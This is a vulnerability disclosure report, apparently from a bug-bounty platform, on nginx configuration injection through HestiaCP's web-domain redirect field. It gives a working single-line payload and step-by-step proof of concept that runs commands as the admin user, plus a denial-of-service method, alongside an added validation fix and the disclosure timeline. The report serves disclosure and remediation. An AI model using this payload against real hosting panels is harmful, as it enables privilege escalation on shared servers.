Improper Input Validation Leads to Privilege Escalation and Denial of Service in hestiacp/hestiacp


Reported on Jul 26th 2022


Improper input validation allows an attacker to escalate privileges and to crash the nginx server.

There is no input validation in v-add-web-domain-redirect#L82: the "v-redirect-custom" input from the "Edit Web Domain" page is written verbatim into the /home/user/conf/web/ file, and that file is in turn included by the /home/user/conf/web/ file, so whatever the user types becomes part of the nginx configuration.


location ~ /\.(?!well-known\/|file) {
    deny all;
    return 404;
}

include /home/test/conf/web/*;

/home/user/conf/web/ file before the payload (input is "asd"):

if ($host != "asd") {
    return 301 $scheme://asd$request_uri;
}

/home/user/conf/web/ file after the payload (the injected value appears twice, once per directive; the "#" in the payload comments out the rest of each template line, and the template's own closing brace closes the final "if ( $host = false ) {" block, so the file still parses):

if ($host != "redStar$request_uri; ## " ) {}   location /adminShell.php { alias /home/test/web/; fastcgi_param REQUEST_METHOD $request_method; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;fastcgi_pass unix:/var/run/php/;  } if ( $host = false ) { #") {
    return 301 $scheme://redStar$request_uri; ## " ) {}   location /adminShell.php { alias /home/test/web/; fastcgi_param REQUEST_METHOD $request_method; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;fastcgi_pass unix:/var/run/php/;  } if ( $host = false ) { #$request_uri;
}
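The following is an added example, not code from the hestiacp project or from the report: it reproduces the unsafe interpolation described above in a small shell function, shows how many nginx blocks the injected value opens, and puts an allow-list check in front of the write. The function names, the regular expression and the sample inputs are this example's own assumptions (the malicious sample keeps only the nginx syntax characters from the report's payload, with the alias path shortened).

```shell
# Added example, not hestiacp code: unsafe interpolation of the redirect target,
# plus an allow-list check that stops the injection. Names and inputs are assumptions.

# Render the redirect snippet the way the generated file above looks:
# the user-controlled value is dropped into two nginx directives verbatim.
render_redirect() {
    printf 'if ($host != "%s") {\n    return 301 $scheme://%s$request_uri;\n}\n' "$1" "$1"
}

# Allow-list check for the redirect target: optional http(s) scheme, a hostname
# built from DNS labels, an optional port and an optional path of URL-safe
# characters. The characters nginx parses as syntax (" ; { } $ # and whitespace)
# cannot appear in a value that passes, so it cannot escape the quoted string.
is_redirect_valid() {
    printf '%s' "$1" | grep -Eq \
        '^(https?://)?([A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)+[A-Za-z]{2,63}(:[0-9]{1,5})?(/[A-Za-z0-9._~%/-]*)?$'
}

# Number of blocks a rendered snippet opens; the legitimate template opens one.
count_open_braces() {
    printf '%s' "$1" | tr -cd '{' | wc -c | tr -d ' '
}

# Validate first, then render: the check the vulnerable script was missing.
safe_render() {
    if is_redirect_valid "$1"; then
        render_redirect "$1"
        return 0
    fi
    printf 'Error: redirect target contains characters that are not allowed\n' >&2
    return 1
}

# Constructed inputs: a benign target and the injection shape used in the report.
BENIGN='www.example.org/landing'
MALICIOUS='redStar$request_uri; ## " ) {}   location /adminShell.php { alias /tmp/; } if ( $host = false ) { #'

# Stand-alone demonstration
render_redirect "$MALICIOUS"        # opens 7 blocks instead of 1
safe_render "$MALICIOUS" || true    # rejected before anything is written
safe_render "$BENIGN"               # rendered normally
```

The count of opened blocks is the quickest offline signal that a value has broken out of the quoted string; on a real host the equivalent check is `nginx -t` against the generated file before it is included, but the allow-list is what stops the value from reaching the file at all.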

Proof of Concept

Payload (it has to be a single line):

redStar$request_uri; ## " ) {}   location /adminShell.php { alias [FULLPATHINFO]; fastcgi_param REQUEST_METHOD $request_method; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;fastcgi_pass unix:/var/run/php/php8.0-fpm-[HOSTNAME].sock;  } if ( $host = false ) { #


[0] Log in as a regular user.

[1] Create a domain in the dashboard.

[2] Go to Files in the top bar.

[3] Go to the "public_html" folder and create a PHP file with the contents below. Open it in a browser and use the printed full path and the hostname to fill in the placeholders of the payload.



<?php
// prints the absolute path of public_html; use it as [FULLPATHINFO] in the payload
echo getcwd();
echo "<br>";

[4] Go to the "Edit Web Domain" page in the dashboard, select "Enable domain redirection", then select "Redirect visitors to a custom domain or web address", enter the payload in the text box and click the save button.

[5] Go to the "public_html" folder and create a PHP file named adminShell.php with the contents below.



<?php
// executed by the PHP-FPM pool behind the socket named in the payload
system("id; whoami;");

[6] Visit /adminShell.php in the browser. The commands run as the "admin" user, because the injected location block hands the request to the PHP-FPM socket named in the payload rather than to the attacking user's own pool.

Attackers can use this to escalate privileges (arbitrary command execution as the "admin" user, as shown above) and to cause a denial of service: a payload that leaves the generated file syntactically invalid breaks the nginx configuration and takes the nginx server down.

We are processing your report and will contact the hestiacp team within 24 hours.
We have contacted a member of the hestiacp team and are waiting to hear back.
We have sent a follow up to the hestiacp team. We will try again in 7 days.
Jaap Marcus modified the Severity from Critical (9.9) to High (8.5).
Jaap Marcus assigned a CVE to this report.
Jaap Marcus validated this vulnerability.
imp has been awarded the disclosure bounty.
Jaap Marcus confirmed that a fix has been merged on b178b9.
Jaap Marcus gave praise: "Thank you for the report."